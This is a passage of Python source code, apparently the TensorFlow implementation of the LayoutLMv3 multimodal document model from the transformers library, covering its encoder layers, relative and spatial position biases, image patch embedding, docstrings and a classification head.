hidden_states = self.dropout(inputs=hidden_states, training=training)
hidden_states = self.LayerNorm(inputs=hidden_states + input_tensor)
return hidden_states
class TFLayoutLMv3Attention(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.self_attention = TFLayoutLMv3SelfAttention(config, name="self")
self.self_output = TFLayoutLMv3SelfOutput(config, name="output")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[tf.Tensor],
head_mask: Optional[tf.Tensor],
output_attentions: bool,
rel_pos: Optional[tf.Tensor] = None,
rel_2d_pos: Optional[tf.Tensor] = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
self_outputs = self.self_attention(
hidden_states,
attention_mask,
head_mask,
output_attentions,
rel_pos,
rel_2d_pos,
training=training,
)
attention_output = self.self_output(self_outputs[0], hidden_states, training=training)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from models.roberta.modeling_tf_bert.TFRobertaIntermediate
class TFLayoutLMv3Intermediate(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = get_tf_activation(config.hidden_act)
else:
self.intermediate_act_fn = config.hidden_act
def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from models.roberta.modeling_tf_bert.TFRobertaOutput
class TFLayoutLMv3Output(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.dropout(inputs=hidden_states, training=training)
hidden_states = self.LayerNorm(inputs=hidden_states + input_tensor)
return hidden_states
class TFLayoutLMv3Layer(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.attention = TFLayoutLMv3Attention(config, name="attention")
self.intermediate = TFLayoutLMv3Intermediate(config, name="intermediate")
self.bert_output = TFLayoutLMv3Output(config, name="output")
def call(
self,
hidden_states: tf.Tensor,
attention_mask: Optional[tf.Tensor],
head_mask: Optional[tf.Tensor],
output_attentions: bool,
rel_pos: Optional[tf.Tensor] = None,
rel_2d_pos: Optional[tf.Tensor] = None,
training: bool = False,
) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
rel_pos=rel_pos,
rel_2d_pos=rel_2d_pos,
training=training,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
intermediate_output = self.intermediate(attention_output)
layer_output = self.bert_output(intermediate_output, attention_output, training=training)
outputs = (layer_output,) + outputs
return outputs
class TFLayoutLMv3Encoder(tf.keras.layers.Layer):
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.config = config
self.layer = [TFLayoutLMv3Layer(config, name=f"layer.{i}") for i in range(config.num_hidden_layers)]
self.has_relative_attention_bias = config.has_relative_attention_bias
self.has_spatial_attention_bias = config.has_spatial_attention_bias
if self.has_relative_attention_bias:
self.rel_pos_bins = config.rel_pos_bins
self.max_rel_pos = config.max_rel_pos
self.rel_pos_bias = tf.keras.layers.Dense(
units=config.num_attention_heads,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=False,
name="rel_pos_bias",
)
if self.has_spatial_attention_bias:
self.max_rel_2d_pos = config.max_rel_2d_pos
self.rel_2d_pos_bins = config.rel_2d_pos_bins
self.rel_pos_x_bias = tf.keras.layers.Dense(
units=config.num_attention_heads,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=False,
name="rel_pos_x_bias",
)
self.rel_pos_y_bias = tf.keras.layers.Dense(
units=config.num_attention_heads,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=False,
name="rel_pos_y_bias",
)
def relative_position_bucket(self, relative_positions: tf.Tensor, num_buckets: int, max_distance: int):
# the negative relative positions are assigned to the interval [0, num_buckets / 2]
# we deal with this by assigning absolute relative positions to the interval [0, num_buckets / 2]
# and then offsetting the positive relative positions by num_buckets / 2 at the end
num_buckets = num_buckets // 2
buckets = tf.abs(relative_positions)
# half of the buckets are for exact increments in positions
max_exact_buckets = num_buckets // 2
is_small = buckets < max_exact_buckets
# the other half of the buckets are for logarithmically bigger bins in positions up to max_distance
buckets_log_ratio = tf.math.log(tf.cast(buckets, tf.float32) / max_exact_buckets)
distance_log_ratio = math.log(max_distance / max_exact_buckets)
buckets_big_offset = (
buckets_log_ratio / distance_log_ratio * (num_buckets - max_exact_buckets)
) # scale is [0, num_buckets - max_exact_buckets]
buckets_big = max_exact_buckets + buckets_big_offset # scale is [max_exact_buckets, num_buckets]
buckets_big = tf.cast(buckets_big, buckets.dtype)
buckets_big = tf.minimum(buckets_big, num_buckets - 1)
return (tf.cast(relative_positions > 0, buckets.dtype) * num_buckets) + tf.where(
is_small, buckets, buckets_big
)
def _cal_pos_emb(
self,
dense_layer: tf.keras.layers.Dense,
position_ids: tf.Tensor,
num_buckets: int,
max_distance: int,
):
rel_pos_matrix = tf.expand_dims(position_ids, axis=-2) - tf.expand_dims(position_ids, axis=-1)
rel_pos = self.relative_position_bucket(rel_pos_matrix, num_buckets, max_distance)
rel_pos_one_hot = tf.one_hot(rel_pos, depth=num_buckets, dtype=self.compute_dtype)
embedding = dense_layer(rel_pos_one_hot)
# batch_size, seq_length, seq_length, num_heads --> batch_size, num_heads, seq_length, seq_length
embedding = tf.transpose(embedding, [0, 3, 1, 2])
embedding = tf.cast(embedding, dtype=self.compute_dtype)
return embedding
def _cal_1d_pos_emb(self, position_ids: tf.Tensor):
return self._cal_pos_emb(self.rel_pos_bias, position_ids, self.rel_pos_bins, self.max_rel_pos)
def _cal_2d_pos_emb(self, bbox: tf.Tensor):
position_coord_x = bbox[:, :, 0] # left
position_coord_y = bbox[:, :, 3] # bottom
rel_pos_x = self._cal_pos_emb(
self.rel_pos_x_bias,
position_coord_x,
self.rel_2d_pos_bins,
self.max_rel_2d_pos,
)
rel_pos_y = self._cal_pos_emb(
self.rel_pos_y_bias,
position_coord_y,
self.rel_2d_pos_bins,
self.max_rel_2d_pos,
)
rel_2d_pos = rel_pos_x + rel_pos_y
return rel_2d_pos
def call(
self,
hidden_states: tf.Tensor,
bbox: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
position_ids: Optional[tf.Tensor] = None,
training: bool = False,
) -> Union[
TFBaseModelOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
]:
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
rel_pos = self._cal_1d_pos_emb(position_ids) if self.has_relative_attention_bias else None
rel_2d_pos = self._cal_2d_pos_emb(bbox) if self.has_spatial_attention_bias else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
output_attentions,
rel_pos=rel_pos,
rel_2d_pos=rel_2d_pos,
training=training,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if return_dict:
return TFBaseModelOutput(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
else:
return tuple(
value for value in [hidden_states, all_hidden_states, all_self_attentions] if value is not None
)
@keras_serializable
class TFLayoutLMv3MainLayer(tf.keras.layers.Layer):
config_class = LayoutLMv3Config
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.config = config
if config.text_embed:
self.embeddings = TFLayoutLMv3TextEmbeddings(config, name="embeddings")
if config.visual_embed:
self.patch_embed = TFLayoutLMv3PatchEmbeddings(config, name="patch_embed")
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob, name="dropout")
if config.has_relative_attention_bias or config.has_spatial_attention_bias:
image_size = config.input_size // config.patch_size
self.init_visual_bbox(image_size=(image_size, image_size))
self.norm = tf.keras.layers.LayerNormalization(epsilon=1e-6, name="norm")
self.encoder = TFLayoutLMv3Encoder(config, name="encoder")
def build(self, input_shape: tf.TensorShape):
if self.config.visual_embed:
image_size = self.config.input_size // self.config.patch_size
self.cls_token = self.add_weight(
shape=(1, 1, self.config.hidden_size),
initializer="zeros",
trainable=True,
dtype=tf.float32,
name="cls_token",
)
self.pos_embed = self.add_weight(
shape=(1, image_size * image_size + 1, self.config.hidden_size),
initializer="zeros",
trainable=True,
dtype=tf.float32,
name="pos_embed",
)
super().build(input_shape)
def get_input_embeddings(self) -> tf.keras.layers.Layer:
return self.embeddings.word_embeddings
def set_input_embeddings(self, value: tf.Variable):
self.embeddings.word_embeddings.weight = value
# Copied from transformers.models.bert.modeling_tf_bert.TFBertMainLayer._prune_heads
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
raise NotImplementedError
def init_visual_bbox(self, image_size: Tuple[int, int], max_len: int = 1000):
# We should not hardcode max_len to 1000, but it is done by the reference implementation,
# so we keep it for compatibility with the pretrained weights. The more correct approach
# would have been to pass on max_len=config.max_2d_position_embeddings - 1.
height, width = image_size
visual_bbox_x = tf.range(0, max_len * (width + 1), max_len) // width
visual_bbox_x = tf.expand_dims(visual_bbox_x, axis=0)
visual_bbox_x = tf.tile(visual_bbox_x, [width, 1]) # (width, width + 1)
visual_bbox_y = tf.range(0, max_len * (height + 1), max_len) // height
visual_bbox_y = tf.expand_dims(visual_bbox_y, axis=1)
visual_bbox_y = tf.tile(visual_bbox_y, [1, height]) # (height + 1, height)
visual_bbox = tf.stack(
[visual_bbox_x[:, :-1], visual_bbox_y[:-1], visual_bbox_x[:, 1:], visual_bbox_y[1:]],
axis=-1,
)
visual_bbox = tf.reshape(visual_bbox, [-1, 4])
cls_token_box = tf.constant([[1, 1, max_len - 1, max_len - 1]], dtype=tf.int32)
self.visual_bbox = tf.concat([cls_token_box, visual_bbox], axis=0)
def calculate_visual_bbox(self, batch_size: int, dtype: tf.DType):
visual_bbox = tf.expand_dims(self.visual_bbox, axis=0)
visual_bbox = tf.tile(visual_bbox, [batch_size, 1, 1])
visual_bbox = tf.cast(visual_bbox, dtype=dtype)
return visual_bbox
def embed_image(self, pixel_values: tf.Tensor) -> tf.Tensor:
embeddings = self.patch_embed(pixel_values)
# add [CLS] token
batch_size = tf.shape(embeddings)[0]
cls_tokens = tf.tile(self.cls_token, [batch_size, 1, 1])
embeddings = tf.concat([cls_tokens, embeddings], axis=1)
# add position embeddings
if getattr(self, "pos_embed", None) is not None:
embeddings += self.pos_embed
embeddings = self.norm(embeddings)
return embeddings
def get_extended_attention_mask(self, attention_mask: tf.Tensor) -> tf.Tensor:
# Adapted from transformers.modelling_utils.ModuleUtilsMixin.get_extended_attention_mask
n_dims = len(attention_mask.shape)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
if n_dims == 3:
extended_attention_mask = tf.expand_dims(attention_mask, axis=1)
elif n_dims == 2:
# Provided a padding mask of dimensions [batch_size, seq_length].
# Make the mask broadcastable to [batch_size, num_heads, seq_length, seq_length].
extended_attention_mask = tf.expand_dims(attention_mask, axis=1) # (batch_size, 1, seq_length)
extended_attention_mask = tf.expand_dims(extended_attention_mask, axis=1) # (batch_size, 1, 1, seq_length)
else:
raise ValueError(f"Wrong shape for attention_mask (shape {attention_mask.shape}).")
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = tf.cast(extended_attention_mask, self.compute_dtype)
extended_attention_mask = (1.0 - extended_attention_mask) * LARGE_NEGATIVE
return extended_attention_mask
def get_head_mask(self, head_mask: Optional[tf.Tensor]) -> Union[tf.Tensor, List[Optional[tf.Tensor]]]:
if head_mask is None:
return [None] * self.config.num_hidden_layers
n_dims = tf.rank(head_mask)
if n_dims == 1:
# Gets a tensor with masks for each head (H).
head_mask = tf.expand_dims(head_mask, axis=0) # 1, num_heads
head_mask = tf.expand_dims(head_mask, axis=0) # 1, 1, num_heads
head_mask = tf.expand_dims(head_mask, axis=-1) # 1, 1, num_heads, 1
head_mask = tf.expand_dims(head_mask, axis=-1) # 1, 1, num_heads, 1, 1
head_mask = tf.tile(
head_mask, [self.config.num_hidden_layers, 1, 1, 1, 1]
) # seq_length, 1, num_heads, 1, 1
elif n_dims == 2:
# Gets a tensor with masks for each layer (L) and head (H).
head_mask = tf.expand_dims(head_mask, axis=1) # seq_length, 1, num_heads
head_mask = tf.expand_dims(head_mask, axis=-1) # seq_length, 1, num_heads, 1
head_mask = tf.expand_dims(head_mask, axis=-1) # seq_length, 1, num_heads, 1, 1
elif n_dims != 5:
raise ValueError(f"Wrong shape for head_mask (shape {head_mask.shape}).")
assert tf.rank(head_mask) == 5, f"Got head_mask rank of {tf.rank(head_mask)}, but require 5."
head_mask = tf.cast(head_mask, self.compute_dtype)
return head_mask
@unpack_inputs
def call(
self,
input_ids: Optional[tf.Tensor] = None,
bbox: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
pixel_values: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[
TFBaseModelOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
]:
# This method can be called with a variety of modalities:
# 1. text + layout
# 2. text + layout + image
# 3. image
# The complexity of this method is mostly just due to handling of these different modalities.
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.return_dict
if input_ids is not None:
input_shape = tf.shape(input_ids)
batch_size = input_shape[0]
seq_length = input_shape[1]
elif inputs_embeds is not None:
input_shape = tf.shape(inputs_embeds)
batch_size = input_shape[0]
seq_length = input_shape[1]
elif pixel_values is not None:
batch_size = tf.shape(pixel_values)[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds or pixel_values")
# Determine which integer dtype to use.
if input_ids is not None:
int_dtype = input_ids.dtype
elif bbox is not None:
int_dtype = bbox.dtype
elif attention_mask is not None:
int_dtype = attention_mask.dtype
elif token_type_ids is not None:
int_dtype = token_type_ids.dtype
else:
int_dtype = tf.int32
if input_ids is not None or inputs_embeds is not None:
if attention_mask is None:
attention_mask = tf.ones((batch_size, seq_length), dtype=int_dtype)
if token_type_ids is None:
token_type_ids = tf.zeros((batch_size, seq_length), dtype=int_dtype)
if bbox is None:
bbox = tf.zeros((batch_size, seq_length, 4), dtype=int_dtype)
embedding_output = self.embeddings(
input_ids=input_ids,
bbox=bbox,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
training=training,
)
final_bbox = None
final_position_ids = None
if pixel_values is not None:
# embed image
visual_embeddings = self.embed_image(pixel_values)
# calculate attention mask
visual_attention_mask = tf.ones((batch_size, tf.shape(visual_embeddings)[1]), dtype=int_dtype)
if attention_mask is None:
attention_mask = visual_attention_mask
else:
attention_mask = tf.concat([attention_mask, visual_attention_mask], axis=1)
# calculate bounding boxes
if self.config.has_spatial_attention_bias:
visual_bbox = self.calculate_visual_bbox(batch_size, int_dtype)
if bbox is None:
final_bbox = visual_bbox
else:
final_bbox = tf.concat([bbox, visual_bbox], axis=1)
# calculate position IDs
if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
visual_position_ids = tf.range(0, tf.shape(visual_embeddings)[1], dtype=int_dtype)
visual_position_ids = tf.expand_dims(visual_position_ids, axis=0)
visual_position_ids = tf.tile(visual_position_ids, [batch_size, 1])
if input_ids is not None or inputs_embeds is not None:
position_ids = tf.expand_dims(tf.range(0, seq_length, dtype=int_dtype), axis=0)
position_ids = tf.tile(position_ids, [batch_size, 1])
final_position_ids = tf.concat([position_ids, visual_position_ids], axis=1)
else:
final_position_ids = visual_position_ids
# calculate embeddings
if input_ids is None and inputs_embeds is None:
embedding_output = visual_embeddings
else:
embedding_output = tf.concat([embedding_output, visual_embeddings], axis=1)
embedding_output = self.LayerNorm(embedding_output)
embedding_output = self.dropout(embedding_output, training=training)
elif self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
if self.config.has_relative_attention_bias:
position_ids = tf.expand_dims(tf.range(0, seq_length, dtype=int_dtype), axis=0)
position_ids = tf.tile(position_ids, [batch_size, 1])
final_position_ids = position_ids
if self.config.has_spatial_attention_bias:
final_bbox = bbox
extended_attention_mask = self.get_extended_attention_mask(attention_mask)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape batch_size x num_heads x seq_length x seq_length
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask)
encoder_outputs = self.encoder(
embedding_output,
bbox=final_bbox,
position_ids=final_position_ids,
attention_mask=extended_attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
if not return_dict:
return (sequence_output,) + encoder_outputs[1:]
return TFBaseModelOutput(
last_hidden_state=sequence_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
return TFBaseModelOutput(
last_hidden_state=sequence_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
class TFLayoutLMv3PreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = LayoutLMv3Config
base_model_prefix = "layoutlmv3"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
size = self.config.input_size
image_shape = (2, self.config.num_channels, size, size)
pixel_values = tf.random.uniform(shape=image_shape, minval=-1, maxval=1)
return {
"input_ids": tf.constant(_DUMMY_INPUT_IDS, dtype=tf.int32),
"bbox": tf.constant(_DUMMY_BBOX, dtype=tf.int32),
"pixel_values": pixel_values,
}
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None), tf.int32, name="input_ids"),
"bbox": tf.TensorSpec((None, None, 4), tf.int32, name="bbox"),
"pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
"attention_mask": tf.TensorSpec((None, None), tf.int32, name="attention_mask"),
}
]
)
def serving(self, inputs):
"""
Method used for serving the model.
Args:
inputs (`Dict[str, tf.Tensor]`):
The input of the saved model as a dictionary of tensors.
"""
output = self.call(inputs)
return self.serving_output(output)
LAYOUTLMV3_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Parameters:
config ([`LayoutLMv3Config`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
LAYOUTLMV3_INPUTS_DOCSTRING = r"""
Args:
input_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are position IDs?](../glossary#position-ids)
head_mask (`tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare LayoutLMv3 Model transformer outputting raw hidden-states without any specific head on top.",
LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3Model(TFLayoutLMv3PreTrainedModel):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"position_ids"]
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
@unpack_inputs
@add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFBaseModelOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[tf.Tensor] = None,
bbox: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
pixel_values: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[
TFBaseModelOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, TFAutoModel
>>> from datasets import load_dataset
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = TFAutoModel.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, words, boxes=boxes, return_tensors="tf")
>>> outputs = model(**encoding)
>>> last_hidden_states = outputs.last_hidden_state
```"""
outputs = self.layoutlmv3(
input_ids=input_ids,
bbox=bbox,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
pixel_values=pixel_values,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return outputs
def serving_output(self, output: TFBaseModelOutput) -> TFBaseModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFBaseModelOutput(
last_hidden_state=output.last_hidden_state,
hidden_states=hs,
attentions=attns,
)
class TFLayoutLMv3ClassificationHead(tf.keras.layers.Layer):
"""
Head for sentence-level classification tasks. Reference: RobertaClassificationHead
"""
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
config.hidden_size,
activation="tanh",
kernel_initializer=get_initializer(config.initializer_range),
name="dense",
)
classifier_dropout = (
config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
)
self.dropout = tf.keras.layers.Dropout(
classifier_dropout,
name="dropout",
)
self.out_proj = tf.keras.layers.Dense(
config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
name="out_proj",
)
def call(self, inputs: tf.Tensor, training: bool = False) -> tf.Tensor:
outputs = self.dropout(inputs, training=training)
outputs = self.dense(outputs)
outputs = self.dropout(outputs, training=training)
outputs = self.out_proj(outputs)
return outputs
@add_start_docstrings(
"""
LayoutLMv3 Model with a sequence classification head on top (a linear layer on top of the final hidden state of the
[CLS] token) e.g. for document image classification tasks such as the
[RVL-CDIP](https://www.cs.cmu.edu/~aharley/rvl-cdip/) dataset.
""",
LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForSequenceClassification(TFLayoutLMv3PreTrainedModel, TFSequenceClassificationLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"position_ids"]
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(config, **kwargs)
self.config = config
self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
self.classifier = TFLayoutLMv3ClassificationHead(config, name="classifier")
@unpack_inputs
@add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFSequenceClassifierOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
labels: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
